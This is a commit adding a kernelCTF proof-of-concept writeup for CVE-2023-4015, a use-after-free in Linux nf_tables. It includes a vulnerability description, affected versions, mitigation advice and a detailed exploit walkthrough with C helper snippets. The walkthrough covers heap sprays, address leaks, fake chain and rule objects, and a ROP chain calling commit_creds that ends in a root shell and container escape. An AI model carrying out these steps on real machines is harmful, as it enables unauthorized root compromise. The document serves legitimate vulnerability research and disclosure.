kernelctf: add CVE-2023-4015_cos
kungfulon committed Nov 30, 2024
1 parent 11d8044 commit a269939
Showing 7 changed files with 856 additions and 0 deletions.
96 changes: 96 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-4015_cos/docs/exploit.md
@@ -0,0 +1,96 @@
# CVE-2023-4015

This document briefly describes the exploit. For more technical details, please refer to the exploit source code.

Triggering the vulnerability requires `CAP_NET_ADMIN`. We can obtain this capability inside a namespace sandbox.
In addition, so that our kernel heap allocations do not span multiple per-CPU slabs, we pin our process to a single CPU.
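
The two setup steps above can be sketched as follows. This is a minimal illustration rather than the code from `exploit.c`: the helper names `write_file`, `setup_sandbox` and `pin_to_cpu` are hypothetical, and the sketch assumes that unprivileged user namespaces are enabled on the target.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Write a short string to a procfs file; returns 0 on success. */
int write_file(const char *path, const char *data)
{
    int fd = open(path, O_WRONLY);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n == (ssize_t)strlen(data) ? 0 : -1;
}

/* Enter new user and network namespaces; the process then holds
 * CAP_NET_ADMIN over the new network namespace. */
int setup_sandbox(void)
{
    char map[64];
    uid_t uid = getuid();
    gid_t gid = getgid();

    if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0)
        return -1;
    /* setgroups must be denied before an unprivileged gid_map write. */
    if (write_file("/proc/self/setgroups", "deny") < 0)
        return -1;
    snprintf(map, sizeof(map), "0 %u 1", (unsigned)uid);
    if (write_file("/proc/self/uid_map", map) < 0)
        return -1;
    snprintf(map, sizeof(map), "0 %u 1", (unsigned)gid);
    return write_file("/proc/self/gid_map", map);
}

/* Restrict the calling thread to one CPU so that all later slab
 * allocations are served from the same per-CPU slab. */
int pin_to_cpu(int cpu)
{
    cpu_set_t set;

    assert(cpu >= 0 && cpu < CPU_SETSIZE);
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    return sched_setaffinity(0, sizeof(set), &set);
}
```

A caller would typically run `setup_sandbox()` once at startup and then `pin_to_cpu(0)` before making any nf_tables request.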

## Triggering the vulnerability

We aim to free an `nft_chain` object that resides in the `kmalloc-128` cache.

- Batch 1
  - Create a table `t`
  - Create a chain `c1`
  - Create a chain `c2` hosting a rule `r2` that has an immediate expression `e2` which binds to `c1`
    + `c1->use = 1`
- Batch 2
  - Create a chain `c3` hosting a rule `r3` that has an immediate expression `e3` which binds to `c1`
    + `c3` should have the `NFT_CHAIN_BINDING` flag
    + `c1->use = 2`
  - Create a chain `c4` hosting a rule `r4` that has an immediate expression `e4` which binds to `c3`
    + However, we do not allow the rule creation to succeed: we add another immediate expression that binds to a nonexistent chain
    + At this point, `nft_rule_expr_deactivate` will be called on `r4` with `phase = NFT_TRANS_PREPARE_ERROR`
    + `nft_immediate_deactivate` will be called on `e4`
    + Since `c3` has the `NFT_CHAIN_BINDING` flag, `nft_rule_expr_deactivate` will be called on `r3`, which will also deactivate `e3`
    + `c1->use = 1`, because deactivating `e3` drops its reference to `c1`
  - Because the batch failed, transaction rollback will be executed with `phase = NFT_TRANS_ABORT`
    + `c3`, `r3`, `e3` will be deactivated again
    + `c1->use = 0`
- Batch 3
  - Because `c1->use = 0`, we can delete chain `c1`
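
The reference counting in the batches above can be followed with a small userspace model. This is only a toy, not kernel code: `toy_chain`, `toy_expr`, `toy_deactivate` and `toy_trigger` are hypothetical names, each chain holds at most one rule with one immediate expression, and the rollback is reduced to the single extra deactivation of `e3` described in the list.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

struct toy_chain;

/* An immediate expression whose verdict jumps to `target`. */
struct toy_expr {
    struct toy_chain *target;
};

struct toy_chain {
    int use;               /* reference counter, like nft_chain.use  */
    bool binding;          /* models the NFT_CHAIN_BINDING flag      */
    struct toy_expr *rule; /* the chain's only rule/expression       */
};

/* Models nft_immediate_deactivate() in a phase other than
 * NFT_TRANS_COMMIT: recurse into a bound chain, then drop one
 * reference on the target chain. */
void toy_deactivate(struct toy_expr *e)
{
    struct toy_chain *c = e->target;

    assert(c != NULL);
    if (c->binding && c->rule != NULL)
        toy_deactivate(c->rule);
    c->use--;
}

/* Replays batches 1 and 2 and returns the final value of c1.use. */
int toy_trigger(void)
{
    struct toy_chain c1 = { .use = 0, .binding = false, .rule = NULL };

    struct toy_expr e2 = { .target = &c1 };  /* batch 1: r2/e2 -> c1 */
    c1.use++;                                /* c1.use == 1 */

    struct toy_expr e3 = { .target = &c1 };  /* batch 2: r3/e3 -> c1 */
    c1.use++;                                /* c1.use == 2 */
    struct toy_chain c3 = { .use = 0, .binding = true, .rule = &e3 };

    struct toy_expr e4 = { .target = &c3 };  /* r4/e4 -> c3 */
    c3.use++;

    toy_deactivate(&e4); /* PREPARE_ERROR: also deactivates e3, c1.use == 1 */
    toy_deactivate(&e3); /* ABORT: e3 deactivated again, c1.use == 0 */

    (void)e2;            /* e2 still points at c1: the dangling reference */
    return c1.use;
}
```

In this model `c1.use` reaches zero while `e2` still points at `c1`, which is the state that batch 3 relies on.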

After this, `e2` holds a dangling reference to the freed chain `c1`.
The names used here are for demonstration purposes only; the exploit uses different ones.
We also create a `spray` chain so that we can later spray the heap with `nft_rule` objects (mostly to avoid accidentally reclaiming the freed chunk by creating a new chain).

## Leak kernel heap address

When an immediate expression that binds to another chain is dumped, we get back the chain's name.
When the chain is freed, the buffer containing its name is also freed, but the pointer to the name is not cleared.
If we reclaim the freed name buffer, but not the freed chain, we can leak data from the start of the reclaimed object up to the first NULL byte.
With a chunk size of 192 (`kmalloc-192`), the address is less likely to contain a NULL byte.
So when creating chain `c1`, we make its name 129-192 bytes long (including the terminating NULL character).
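
As a rough sketch of the size selection, the helper below maps an allocation size to a general-purpose kmalloc cache and builds a name whose allocation lands in `kmalloc-192`. The names `kmalloc_bucket` and `make_chain_name` are hypothetical, and the cache size table is an assumption based on the usual x86_64 configuration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Return the object size of the smallest kmalloc cache that fits
 * `size`, or 0 if it is larger than the caches listed here. */
size_t kmalloc_bucket(size_t size)
{
    static const size_t caches[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
    };

    for (size_t i = 0; i < sizeof(caches) / sizeof(caches[0]); i++)
        if (size <= caches[i])
            return caches[i];
    return 0;
}

/* Fill `buf` with a name that occupies exactly `alloc_size` bytes,
 * including the terminating NULL character. */
void make_chain_name(char *buf, size_t alloc_size, char fill)
{
    assert(alloc_size >= 1);
    memset(buf, fill, alloc_size - 1);
    buf[alloc_size - 1] = '\0';
}
```

For example, a buffer filled with `make_chain_name(name, 192, 'A')` has `strlen(name) == 191`, and `kmalloc_bucket(strlen(name) + 1)` returns 192.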

We use `nft_rule` as the spraying object to reclaim the freed name chunk because:

- It is an elastic object, so we can target many caches
- The elastic portion consists of a flattened expression array (up to 128 expressions) and arbitrary user data (up to 255 bytes)
- Its first field is a `list_head`, so we can leak the heap addresses of the next rule and the previous rule

We create many rules with enough user data that the total length of the `nft_rule` struct falls in the range 129-192 bytes.
After spraying, we request a dump of `r2`, which dumps `e2` and, if the reclaim succeeded, gives us the heap address of an `nft_rule` object.
If the leak fails, we try again.
We are also able to leak the `handle` of the rule object that reclaimed the freed name chunk.
In a later stage, the handle lets us free exactly the rule whose heap address we obtained.
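
A leaked name could be decoded along the following lines. This is a sketch under stated assumptions, not the exploit's parser: `rule_leak` and `parse_rule_leak` are hypothetical names, the target is assumed to be little-endian x86_64, and the `nft_rule` header is assumed to be a `list_head` followed by a 64-bit word whose low 42 bits hold the handle.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

struct rule_leak {
    uint64_t next;   /* list.next of the reclaiming rule */
    uint64_t prev;   /* list.prev of the reclaiming rule */
    uint64_t handle; /* handle of the reclaiming rule    */
};

/* Decode the string returned as the chain name. Returns 0 on success
 * and -1 if the leak was cut short or does not look like two kernel
 * heap pointers. */
int parse_rule_leak(const char *name, struct rule_leak *out)
{
    uint8_t raw[24] = { 0 };
    uint64_t word;
    size_t len = 0;

    assert(name != NULL && out != NULL);

    /* The dump stops at the first NULL byte, so copy only that much. */
    while (len < sizeof(raw) && name[len] != '\0')
        len++;
    if (len < 16)
        return -1; /* a pointer contained a NULL byte: retry the spray */
    memcpy(raw, name, len);

    memcpy(&out->next, raw, 8);
    memcpy(&out->prev, raw + 8, 8);
    memcpy(&word, raw + 16, 8);
    out->handle = word & ((1ULL << 42) - 1);

    /* Kernel addresses on x86_64 have the top 16 bits set. */
    if ((out->next >> 48) != 0xffff || (out->prev >> 48) != 0xffff)
        return -1;
    return 0;
}
```

Because small handles contain NULL bytes in their upper part, the string usually ends inside the third word; the zero padding of `raw` accounts for that.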

We also add an `nft_notrack` expression to each sprayed rule so that the rule contains a kernel pointer, which we leak in the next stage once we have the heap leak. The in-memory layout of the sprayed rules looks like this (the first 0x18 bytes are rule metadata):

| Offset | Field | Value |
|--------|-------|-------|
| ... | | |
| 0x18 | expression | `nft_notrack_ops` |
| 0x20 | `nft_userdata.len` | x |
| 0x21 | `nft_userdata.data` | any |
| ... | | |
| 0xbf | `nft_userdata.data` | any |
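
The layout in the table can be mirrored in a userspace struct to check the offsets and to work out how much user data a rule of a given total size needs. `struct sprayed_rule` and `udata_bytes_for` are hypothetical names; the struct is a flat stand-in for the kernel objects, not their real definitions.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Flat userspace mirror of a sprayed rule that fills kmalloc-192. */
struct sprayed_rule {
    uint64_t list_next;          /* 0x00: list.next                    */
    uint64_t list_prev;          /* 0x08: list.prev                    */
    uint64_t meta;               /* 0x10: remaining rule metadata      */
    uint64_t expr_ops;           /* 0x18: points to nft_notrack_ops    */
    uint8_t  udata_len;          /* 0x20: nft_userdata.len             */
    uint8_t  udata[0xc0 - 0x21]; /* 0x21..0xbf: nft_userdata.data      */
};

_Static_assert(offsetof(struct sprayed_rule, expr_ops) == 0x18, "expr offset");
_Static_assert(offsetof(struct sprayed_rule, udata_len) == 0x20, "len offset");
_Static_assert(offsetof(struct sprayed_rule, udata) == 0x21, "data offset");
_Static_assert(sizeof(struct sprayed_rule) == 0xc0, "must fill kmalloc-192");

/* Number of user data bytes needed so that a rule carrying one
 * nft_notrack expression has a total size of `total` bytes. */
size_t udata_bytes_for(size_t total)
{
    assert(total > offsetof(struct sprayed_rule, udata));
    return total - offsetof(struct sprayed_rule, udata);
}
```

For the full 192-byte object, `udata_bytes_for(0xc0)` gives 0x9f bytes of user data.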

## Leak kernel base address

Now that we have a heap leak and know that a kernel address is stored inside that chunk, we leak it by reclaiming the freed chain with a fake chain whose name points into the leaked heap region (reminder: the freed `nft_chain` is in the `kmalloc-128` cache).
This time we spray using the `userdata` of `nft_table`, which can hold at most 256 bytes of arbitrary data.
We create multiple `nft_table` objects with different names, each with 128 bytes of `userdata` laid out as follows:

| Offset | `nft_chain` field | Value | Remarks |
|--------|-------------------|-------|---------|
| 0x0 | `list` | any | |
| 0x10 | `rules.next` | heap leak | for next stage |
| 0x18 | `rules.prev` | heap leak | for next stage |
| ... | | | |
| 0x54 | `flags` | `NFT_CHAIN_BINDING` | for next stage |
| 0x58 | `name` | heap leak + `sizeof(struct nft_rule)` | where we put `nft_notrack_ops` in the sprayed rule above |
| ... | | | |
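
The table can be turned into a buffer builder roughly as follows. This is a sketch only: `build_fake_chain` and the `OFF_*` constants are hypothetical names taken from the offsets in the table, `RULE_HEADER_SIZE` assumes `sizeof(struct nft_rule)` is 0x18 as stated earlier, and the value 0x4 for `NFT_CHAIN_BINDING` is an assumption copied from the uapi header rather than included from it.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define FAKE_CHAIN_SIZE       128  /* object size of kmalloc-128        */
#define OFF_RULES_NEXT        0x10
#define OFF_RULES_PREV        0x18
#define OFF_FLAGS             0x54
#define OFF_NAME              0x58
#define RULE_HEADER_SIZE      0x18 /* assumed sizeof(struct nft_rule)   */
#define TOY_NFT_CHAIN_BINDING 0x4  /* assumed value of NFT_CHAIN_BINDING */

/* Fill `buf` with the table userdata that impersonates an nft_chain. */
void build_fake_chain(uint8_t buf[FAKE_CHAIN_SIZE], uint64_t heap_leak)
{
    uint64_t name = heap_leak + RULE_HEADER_SIZE;

    assert(buf != NULL);
    memset(buf, 0x41, FAKE_CHAIN_SIZE);          /* "any" fields      */
    memcpy(buf + OFF_RULES_NEXT, &heap_leak, 8); /* for next stage    */
    memcpy(buf + OFF_RULES_PREV, &heap_leak, 8); /* for next stage    */
    buf[OFF_FLAGS] = TOY_NFT_CHAIN_BINDING;      /* for next stage    */
    memcpy(buf + OFF_NAME, &name, 8);            /* -> nft_notrack_ops */
}
```

The resulting 128-byte buffer would be passed as the `userdata` attribute of each sprayed table.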

After spraying, we request to dump `r2` which will dump `e2` and hopefully we will get the address of `nft_notrack_ops`.
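
Turning the dumped name into a kernel base address might look like the sketch below. The offset `NFT_NOTRACK_OPS_OFFSET` is a placeholder value chosen for illustration, not the real offset for any kernel build, and `leaked_name_to_ptr` and `kernel_base` are hypothetical helper names. The sketch assumes a little-endian x86_64 target where `nft_notrack_ops` lives in the kernel image.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* PLACEHOLDER: offset of nft_notrack_ops from the kernel base.
 * The real value depends on the exact target kernel build. */
#define NFT_NOTRACK_OPS_OFFSET 0x1b2c3a0ULL

/* Interpret the first (up to) 8 bytes of the dumped name as a pointer.
 * Returns 0 if it looks like a kernel image address, -1 otherwise. */
int leaked_name_to_ptr(const char *name, uint64_t *out)
{
    uint8_t raw[8] = { 0 };
    size_t len = 0;

    assert(name != NULL && out != NULL);
    while (len < sizeof(raw) && name[len] != '\0')
        len++;
    memcpy(raw, name, len);
    memcpy(out, raw, sizeof(raw));

    /* The x86_64 kernel image is mapped at 0xffffffff8......... */
    return (*out >> 32) == 0xffffffffULL ? 0 : -1;
}

/* Subtract the (placeholder) symbol offset to get the kernel base. */
uint64_t kernel_base(uint64_t notrack_ops_addr)
{
    return notrack_ops_addr - NFT_NOTRACK_OPS_OFFSET;
}
```

A useful sanity check on the result is that the computed base should be aligned as the KASLR configuration of the target requires; a misaligned base suggests a truncated leak or a wrong offset.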

## RIP control and return to userspace

Since we have the `handle` of the rule whose address was leaked, we delete that rule.
Then we spray a fake `nft_rule` that also acts as a ROP chain. Remember that the deleted rule resided in the `kmalloc-192` cache.
We set `dlen` of the fake rule to 1 to pass the expression loop check.
We craft a fake expression whose `ops` points into the leaked heap region, arranged so that `ops->deactivate` lines up with a JOP gadget.
Following that, we build a ROP chain that calls `commit_creds(&init_cred)` and `switch_task_namespaces(find_task_by_vpid(getpid()), &init_nsproxy)`, then returns to userspace.

After spraying, we delete the rule `r2`, which calls `nft_rule_expr_deactivate` on `e2`. Since we prepared a fake rule list for the reclaimed fake chain and set its flag to `NFT_CHAIN_BINDING`, the fake rule is deactivated and the fake expression's `deactivate` routine is called, which triggers the JOP gadget and then the ROP chain.

Returning to userspace, we use `setns` to escape from the jail then spawn a root shell using `execve`.
48 changes: 48 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-4015_cos/docs/vulnerability.md
@@ -0,0 +1,48 @@
# CVE-2023-4015

In `nft_immediate_deactivate`, if the immediate expression has `dreg == NFT_REG_VERDICT` and is bound to a chain with the `NFT_CHAIN_BINDING` flag, `nft_rule_expr_deactivate` is called on every rule in the bound chain.
This in turn calls the `deactivate` method of every expression belonging to those rules. If one of them is an immediate expression bound to a chain, it goes through the same deactivation routine.
Finally, each time this function is called in a transaction phase other than `NFT_TRANS_COMMIT`, `nft_data_release` decrements the bound chain's `use` counter by `1`.

The problem arises when this function is called twice on the same expression within a single transaction, in any phase other than `NFT_TRANS_COMMIT`: the bound chain's `use` counter is then decremented by `2`.
If two objects hold a reference to the chain, its `use` counter drops to `0`, which allows the chain to be deleted while a dangling reference to it remains.

Before commit [26b5a5712eb85e253724e56a54c17f8519bd8e4e](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=26b5a5712eb85e253724e56a54c17f8519bd8e4e), there were no vulnerable code paths.
However, that commit introduced the `NFT_TRANS_PREPARE_ERROR` phase, which opened up a way to reach the UAF condition: when an error occurs while creating a rule, `deactivate` is called on the expressions that were already created successfully, and these can be immediate expressions bound to a chain created in the same batch.
The chain in the batch is then deactivated a second time when the transaction is rolled back.
A detailed demonstration of the UAF can be found in exploit.md.

## Requirements to trigger the vulnerability

|Capabilities|Kernel configuration|Are user namespaces needed?|
|---|---|---|
|CAP_NET_ADMIN|CONFIG_NF_TABLES|Yes|

## Commit which introduced the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=26b5a5712eb85e253724e56a54c17f8519bd8e4e

## Commit which fixed the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0a771f7b266b02d262900c75f1e175c7fe76fec2

## Affected kernel versions

- 5.10.188 - 5.10.189
- 5.15.119 - 5.15.123
- 6.1.36 - 6.1.42
- 6.3.10 - 6.3.13
- 6.4 - 6.4.7
- 6.5-rc1 - 6.5-rc3
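
For stable releases, the ranges above can be checked mechanically with a small lookup like the following. `affected_range` and `is_affected` are hypothetical names, and the sketch deliberately ignores the 6.5 release candidates because they do not fit a `major.minor.patch` triple.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

struct affected_range {
    int major, minor;
    int first_patch, last_patch; /* inclusive bounds */
};

/* Stable ranges copied from the list above (6.5-rc1..rc3 omitted). */
static const struct affected_range affected[] = {
    { 5, 10, 188, 189 },
    { 5, 15, 119, 123 },
    { 6, 1, 36, 42 },
    { 6, 3, 10, 13 },
    { 6, 4, 0, 7 },
};

/* Return true if the given stable kernel version is in a listed range. */
bool is_affected(int major, int minor, int patch)
{
    assert(major >= 0 && minor >= 0 && patch >= 0);
    for (size_t i = 0; i < sizeof(affected) / sizeof(affected[0]); i++) {
        const struct affected_range *r = &affected[i];

        if (r->major == major && r->minor == minor &&
            patch >= r->first_patch && patch <= r->last_patch)
            return true;
    }
    return false;
}
```

Distribution kernels often backport fixes without changing the upstream version number, so a result from this check is only a first indication.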

## Affected component, subsystem

netfilter/nf_tables

## Cause

Use-after-free

## Which syscalls or syscall parameters are needed to be blocked to prevent triggering the vulnerability?

Disable the ability to communicate with the nf_tables subsystem from unprivileged user namespaces, or prevent the creation of unprivileged user namespaces.
@@ -0,0 +1 @@
deps
@@ -0,0 +1,16 @@
CFLAGS=-D_GNU_SOURCE -std=gnu17 -Wall -O0 -static -I./deps/include
LIBS=deps/lib/libnftnl.a deps/lib/libmnl.a

.PHONY: exploit
exploit:
	$(CC) $(CFLAGS) exploit.c -o exploit $(LIBS)

prerequisites:
	mkdir -p deps
	wget -O libmnl-1.0.5.tar.bz2 https://www.netfilter.org/pub/libmnl/libmnl-1.0.5.tar.bz2
	tar -xf libmnl-1.0.5.tar.bz2
	cd libmnl-1.0.5 && ./configure --prefix=$(PWD)/deps --enable-static=yes --enable-shared=no && make install
	wget -O libnftnl-1.2.8.tar.xz https://www.netfilter.org/pub/libnftnl/libnftnl-1.2.8.tar.xz
	tar -xf libnftnl-1.2.8.tar.xz
	cd libnftnl-1.2.8 && LIBMNL_CFLAGS=-I$(PWD)/deps/include LIBMNL_LIBS=$(PWD)/deps/lib/libmnl.a ./configure --prefix=$(PWD)/deps --enable-static=yes --enable-shared=no && make install
	rm -rf libmnl* libnftnl*